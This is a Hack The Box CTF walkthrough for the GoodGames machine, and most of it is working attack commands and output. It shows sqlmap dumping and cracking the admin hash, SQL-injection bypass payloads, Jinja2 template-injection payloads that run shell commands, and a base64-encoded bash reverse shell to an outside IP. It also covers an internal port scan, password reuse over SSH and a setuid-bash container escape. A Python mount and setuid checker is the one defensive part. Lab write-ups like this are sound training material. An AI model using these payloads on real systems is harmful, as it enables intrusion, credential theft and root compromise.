DaddyBigFish

GoodGames

Wed, 18 September 2024
Platform: Hack The Box

Nmap scan report for 10.10.11.130
Host is up (0.043s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.84 seconds
curl 10.10.11.130

<form action="/login" method="POST" class="nk-form text-white">
    <div class="row vertical-gap">
        <div class="col-md-12">
            Use email and password:

            <div class="nk-gap"></div>
            <input type="email" value="" name="email" class=" form-control" placeholder="Email">

            <div class="nk-gap"></div>
            <input type="password" value="" name="password" class="required form-control" placeholder="Password">
        </div>
    </div>

    <div class="nk-gap-1"></div>
    <div class="row vertical-gap">
        <div class="col-md-6">
            <button type="submit" class="nk-btn nk-btn-rounded nk-btn-color-white nk-btn-block">Sign In</button>
        </div>
        <div class="col-md-6">
            <div class="mnt-5">
                <small><a href="/forgot-password">Forgot your password?</a></small>
            </div>
            <div class="mnt-5">
                <small><a href="/signup">Not a member? Sign up</a></small>
            </div>
        </div>
    </div>
</form>
sqlmap goodgames.htb --forms --crawl=2 -o --threads 10 --batch -T user --dump

Database: main
Table: user
[1 entry]
+----+---------------------+--------+----------------------------------+
| id | email               | name   | password                         |
+----+---------------------+--------+----------------------------------+
| 1  | admin@goodgames.htb | admin  | 2b22337f218b2d82dfc3b6f77e7cb8ec |
+----+---------------------+--------+----------------------------------+
echo '2b22337f218b2d82dfc3b6f77e7cb8ec' | johnx rockyou

Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
superadministrator (?)     
1g 0:00:00:00 DONE (2024-09-16 02:44) 4.545g/s 15799Kp/s 15799Kc/s 15799KC/s superant5564..super teengohan3
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 
ffuf -u "http://goodgames.htb/login" -v \
-X POST -d "email=FUZZ&password=" \
-H "Content-Type: application/x-www-form-urlencoded" \
-w /usr/share/seclists/Fuzzing/Databases/sqli.auth.bypass.txt \
-mr 'Welcome|Success|Hello'

[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 91ms]
| URL | http://goodgames.htb/login
    * FUZZ: ' or 1=1#

[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 107ms]
| URL | http://goodgames.htb/login
    * FUZZ: admin' or 1=1#

[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 125ms]
| URL | http://goodgames.htb/login
    * FUZZ: admin' or '1'='1'#

[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 133ms]
| URL | http://goodgames.htb/login
    * FUZZ: admin'or 1=1 or ''='

[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 125ms]
| URL | http://goodgames.htb/login
    * FUZZ: root' or '1'='1'#

[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 124ms]
| URL | http://goodgames.htb/login
    * FUZZ: root' or 1=1#

[Status: 200, Size: 9449, Words: 2091, Lines: 268, Duration: 129ms]
| URL | http://goodgames.htb/login
    * FUZZ: root'or 1=1 or ''='
curl goodgames.htb/login -d "email=' or 1=1#&password=" -is | grep "Cookie:"
Set-Cookie: session=.eJw1yz0KgDAMBtC7fHMRXDN5E4kkjYX-QNNO4t3t4v7egzN29RsUObsGaOGUQWApqR7WmhgX9e0eFwKSgPaA3MxUUgWNPlearr0u9j-8Hz1GHgw.ZudwDg.4h9aY3Pg6jCweVgaTRXdjJ-F8tc; HttpOnly; Path=/
http://internal-administration.goodgames.htb/

sudo nano /etc/hosts
10.10.11.130 goodgames.htb internal-administration.goodgames.htb
http://internal-administration.goodgames.htb/login

<form method="post" action="" class="mt-4">

<input id="csrf_token" name="csrf_token" type="hidden" value="ImVmNzIwM2IwM2UwMTk4ZmZmN2Y2ZTFiMDFiNmYzMzE0ZmJhMzY2ZmMi.Zud2WQ.LJ2mw3T63Ulyzw5Jdh2GB_L7vDE">

<!-- Form -->
<div class="form-group mb-4">
    <label for="email">Username</label>
    <div class="input-group">
        <span class="input-group-text" id="basic-addon1">
            <span class="fas fa-user-circle"></span>
        </span>
        <input class="form-control" id="username_login" name="username" placeholder="Username" required type="text" value="">
    </div>  
</div>
<!-- End of Form -->
<div class="form-group">
    <!-- Form -->
    <div class="form-group mb-4">
        <label for="password">Your Password</label>
        <div class="input-group">
            <span class="input-group-text" id="basic-addon2">
                <span class="fas fa-unlock-alt"></span>
            </span>
            <input class="form-control" id="pwd_login" name="password" placeholder="Password" required type="password" value="">
        </div>  
    </div>
    <!-- End of Form -->
    <div class="d-flex justify-content-between align-items-top mb-4">
        <div class="form-check">
            <input class="form-check-input" type="checkbox" value="" id="remember">
            <label class="form-check-label mb-0" for="remember">
              Remember me
            </label>
        </div>
    </div>
</div>
<div class="d-grid">
    <button type="submit" name="login" class="btn btn-gray-800">Sign In</button>
</div>
</form>
http://internal-administration.goodgames.htb/login
admin:superadministrator
POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjFqRDEMBNC7uE4h68uWtJdZJEsiIZDA_7tVyN3XITDNTDG8n3avM6_3dnucz3xr949ot4ZHrxmOUyuKyGNYL8zebTgJQ3jSwZIopDTLSwAVJrkiLZ0sejCMOlBL3MzTfaBqEY5JyYkUYMK2DMsFBNJWmO3PHcjeNuR55fmv-avrOuv--P7Mrz0Eu2C31EBIVxobxzHZZA1aG6MGI7i33xfrYT9Z.Zui01w.-0XWj6PT1xqznLIkLo4lL5HoTFw
Upgrade-Insecure-Requests: 1
Priority: u=0, i

name={{7*7}}


<h4 class="h3">
    49
</h4>
<h5 class="fw-normal">
    admin
</h5>
<p class="text-gray mb-4">
    admin@goodgames.htb
</p>
SecLists/Fuzzing/template-engines-special-vars.txt

# JINJA2 (PYTHON)
# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
# https://stackoverflow.com/a/40346872/451455
self._TemplateReference__context
POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjFqRDEMBNC7uE4h68uWtJdZJEsiIZDA_7tVyN3XITDNTDG8n3avM6_3dnucz3xr949ot4ZHrxmOUyuKyGNYL8zebTgJQ3jSwZIopDTLSwAVJrkiLZ0sejCMOlBL3MzTfaBqEY5JyYkUYMK2DMsFBNJWmO3PHcjeNuR55fmv-avrOuv--P7Mrz0Eu2C31EBIVxobxzHZZA1aG6MGI7i33xfrYT9Z.Zui01w.-0XWj6PT1xqznLIkLo4lL5HoTFw
Upgrade-Insecure-Requests: 1
Priority: u=0, i

name={{ self._TemplateReference__context }}


<h4 class="h3">
    <Context {'namespace': <class 'jinja2.utils.Namespace'>, 
    'range': <class 'range'>, 
    'cycler': <class 'jinja2.utils.Cycler'>, 
    'get_flashed_messages': <function get_flashed_messages at 0x7f7f6faf6ae8>, 
    'config': <Config {'ENV': 'production', 
    'DEBUG': False, 
    'TESTING': False, 
    'PROPAGATE_EXCEPTIONS': None, 
    'PRESERVE_CONTEXT_ON_EXCEPTION': None, 
    'SECRET_KEY': 'S3cr3t_K#Key', 
    'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 
    'USE_X_SENDFILE': False, 
    'SERVER_NAME': None, 
    'APPLICATION_ROOT': '/', 
    'SESSION_COOKIE_NAME': 'session', 
    'SESSION_COOKIE_DOMAIN': False, 
    'SESSION_COOKIE_PATH': None, 
    'SESSION_COOKIE_HTTPONLY': True, 
    'SESSION_COOKIE_SECURE': False, 
    'SESSION_COOKIE_SAMESITE': None, 
    'SESSION_REFRESH_EACH_REQUEST': True, 
    'MAX_CONTENT_LENGTH': None, 
    'SEND_FILE_MAX_AGE_DEFAULT': None, 
    'TRAP_BAD_REQUEST_ERRORS': None, 
    'TRAP_HTTP_EXCEPTIONS': False, 
    'EXPLAIN_TEMPLATE_LOADING': False, 
    'PREFERRED_URL_SCHEME': 'http', 
    'JSON_AS_ASCII': True, 
    'JSON_SORT_KEYS': True, 
    'JSONIFY_PRETTYPRINT_REGULAR': False, 
    'JSONIFY_MIMETYPE': 'application/json', 
    'TEMPLATES_AUTO_RELOAD': None, 
    'MAX_COOKIE_SIZE': 4093, 
    'SQLALCHEMY_DATABASE_URI': 'sqlite:////backend/project/apps/db.sqlite3', 
    'SQLALCHEMY_TRACK_MODIFICATIONS': False, 
    'SQLALCHEMY_BINDS': None, 
    'SQLALCHEMY_NATIVE_UNICODE': None,
    'SQLALCHEMY_ECHO': False, 
    'SQLALCHEMY_RECORD_QUERIES': None, 
    'SQLALCHEMY_POOL_SIZE': None, 
    'SQLALCHEMY_POOL_TIMEOUT': None, 
    'SQLALCHEMY_POOL_RECYCLE': None, 
    'SQLALCHEMY_MAX_OVERFLOW': None, 
    'SQLALCHEMY_COMMIT_ON_TEARDOWN': False, 
    'SQLALCHEMY_ENGINE_OPTIONS': {}}>, 
    'joiner': <class 'jinja2.utils.Joiner'>, 
    'session': <SecureCookieSession {'_fresh': True, 
    '_id': '231f6db269fdf44bd5a1f2e11a5b4870dbe4378e284946fbf8029064b924c967893705f329f8baabebb5299f42564e7e24d0a87aca2fb8080eacdaa4374370e1', 
    '_user_id': '1', 
    'csrf_token': 'd7b821ae9d20eb9451f27d67a8c54cf809a05d71'}>, 
    'g': <flask.g of 'apps'>, 
    'lipsum': <function generate_lorem_ipsum at 0x7f7f6ff2b488>, 
    'request': <Request 'http://localhost:8085/settings' [POST]>, 
    'url_for': <function url_for at 0x7f7f6faf68c8>, 
    'dict': <class 'dict'>, 
    'segment': 'settings', 
    'current_user': admin} of None>
</h4>
<h5 class="fw-normal">
    admin
</h5>
<p class="text-gray mb-4">
    admin@goodgames.htb
</p>
name={{namespace.__init__.__globals__.os.popen('id').read()}}

<h4 class="h3">
    uid=0(root) gid=0(root) groups=0(root)
</h4>
<h5 class="fw-normal">
    admin
</h5>
<p class="text-gray mb-4">
    admin@goodgames.htb
</p>
name={{namespace.__init__.__globals__.os.popen('cat /etc/passwd').read()}}

<h4 class="h3">
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/bin/false
</h4>
<h5 class="fw-normal">
    admin
</h5>
<p class="text-gray mb-4">
    admin@goodgames.htb
</p>
bash -c "bash -i </dev/tcp/10.10.16.4/4435 >&0 2>&1"
echo 'bash -c "bash -i </dev/tcp/10.10.16.4/4435 >&0 2>&1"' | base64
YmFzaCAtYyAiYmFzaCAtaSA8L2Rldi90Y3AvMTAuMTAuMTYuNC80NDM1ID4mMCAyPiYxIgo=
name={{namespace.__init__.__globals__.os.popen('echo YmFzaCAtYyAiYmFzaCAtaSA8L2Rldi90Y3AvMTAuMTAuMTYuNC80NDM1ID4mMCAyPiYxIgo=|base64 -d|/bin/bash').read()}}
root@3a453ab39d3d:/backend# ls -la
ls -la
total 192
drwxr-xr-x 1 root root   4096 Sep 17 22:50 .
drwxr-xr-x 1 root root   4096 Nov  5  2021 ..
-rw-r--r-- 1 root root    122 Nov  3  2021 Dockerfile
-rw------- 1 root root 417792 Sep 17 22:42 core
drwxr-xr-x 1 root root   4096 Nov  3  2021 project
-rw-r--r-- 1 root root    208 Nov  3  2021 requirements.txt

root@3a453ab39d3d:/home# ls
augustus

root@3a453ab39d3d:/home/augustus# ls
user.txt

root@3a453ab39d3d:/home/augustus# cat user.txt
aa82ade36595a75ef784bf44f88a29f3
══╣ Breakout via mounts
═╣ /proc mounted? ................. Yes
═╣ release_agent breakout 1........ Yes
═╣ /proc/sched_debug readable ..... Yes
═╣ /sys/kernel/security present ... Yes
mount

/dev/sda1 on /home/augustus type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro)
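A defender-side check for the mount finding above, added here as an example and not part of the original writeup: it parses `mount` lines in the format shown (the sample is constructed from the output above plus one overlay root line), flags host block-device mounts that are writable from inside the container beyond Docker's own /etc/resolv.conf, /etc/hostname and /etc/hosts binds, and lists setuid files under such a path, which is the condition the rest of this writeup turns into host root.

```python
import os
import re
import stat
from typing import List

# Docker bind-mounts these three files itself, so a host device on them is expected.
DOCKER_MANAGED = {"/etc/resolv.conf", "/etc/hostname", "/etc/hosts"}

# Constructed sample in the format of `mount` inside the container (values from the writeup).
SAMPLE_MOUNT_OUTPUT = """\
/dev/sda1 on /home/augustus type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro)
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/x)
"""

MOUNT_RE = re.compile(r"^(?P<src>\S+) on (?P<target>\S+) type (?P<fstype>\S+) \((?P<opts>[^)]*)\)$")


def parse_mounts(text: str) -> List[dict]:
    """Turn `mount` output into dicts with src, target, fstype and a list of opts."""
    entries = []
    for line in text.splitlines():
        m = MOUNT_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["opts"] = d["opts"].split(",")
            entries.append(d)
    return entries


def writable_host_mounts(text: str) -> List[str]:
    """Mount targets backed by a host block device, mounted rw, outside Docker's managed files."""
    hits = []
    for e in parse_mounts(text):
        if e["src"].startswith("/dev/") and "rw" in e["opts"] and e["target"] not in DOCKER_MANAGED:
            hits.append(e["target"])
    return hits


def setuid_files(root: str) -> List[str]:
    """Recursively list regular files under root that carry the setuid bit (missing root -> [])."""
    found = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(p)
    return found
```

Run `writable_host_mounts` on live `mount` output inside the container and `setuid_files` on each flagged target; any hit is a path where a container root can plant a binary the host will honour, so the mount should be read-only or dropped.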
root@3a453ab39d3d:/backend# cat /etc/hosts

127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.2  3a453ab39d3d
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from");done;
64 bytes from 172.19.0.1: icmp_seq=1 ttl=64 time=0.044 ms
64 bytes from 172.19.0.2: icmp_seq=1 ttl=64 time=0.021 ms

# Derive the /24 prefix from eth0 instead of hardcoding it
prefix=$(ip -o -f inet addr show eth0 | awk '{print $4}' | cut -d'.' -f1-3)
for i in {1..254}; do
  if ping -c 1 "${prefix}.${i}" | grep "bytes from" > /dev/null; then
    echo "Scanning ${prefix}.${i}..."
    # bash /dev/tcp connect test, no nmap needed inside the container
    for port in {1..65535}; do
      (echo >"/dev/tcp/${prefix}.${i}/${port}") >/dev/null 2>&1 && echo "[open]  ${port}"
    done
  fi
done

Scanning 172.19.0.1...
[open]  22
[open]  80
Scanning 172.19.0.2...
[open]  8085  
[open]  53650
[open]  54516
root@3a453ab39d3d:/home/augustus# ssh augustus@172.19.0.1

The authenticity of host '172.19.0.1 (172.19.0.1)' can't be established.
ECDSA key fingerprint is SHA256:AvB4qtTxSVcB0PuHwoPV42/LAJ9TlyPVbd7G6Igzmj0.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '172.19.0.1' (ECDSA) to the list of known hosts.
augustus@172.19.0.1's password: superadministrator

Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
augustus@GoodGames:~$ 
augustus@GoodGames:~$ cp /bin/bash .
augustus@GoodGames:~$ exit
exit
logout
Connection to 172.19.0.1 closed.
root@3a453ab39d3d:/home/augustus# chown root:root bash
root@3a453ab39d3d:/home/augustus# chmod 4755 bash
root@3a453ab39d3d:/home/augustus# ls -la

total 1232
-rwsr-xr-x 1 root root 1234376 Sep 18 01:00 bash
root@3a453ab39d3d:~# ssh augustus@172.19.0.1
augustus@172.19.0.1's password: superadministrator

Linux GoodGames 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 18 01:57:37 2024 from 172.19.0.2
augustus@GoodGames:~$ ./bash -p
bash-5.1# cat /root/root.txt
9b5af2bb2042fc72d6fc9c4e6c199bdb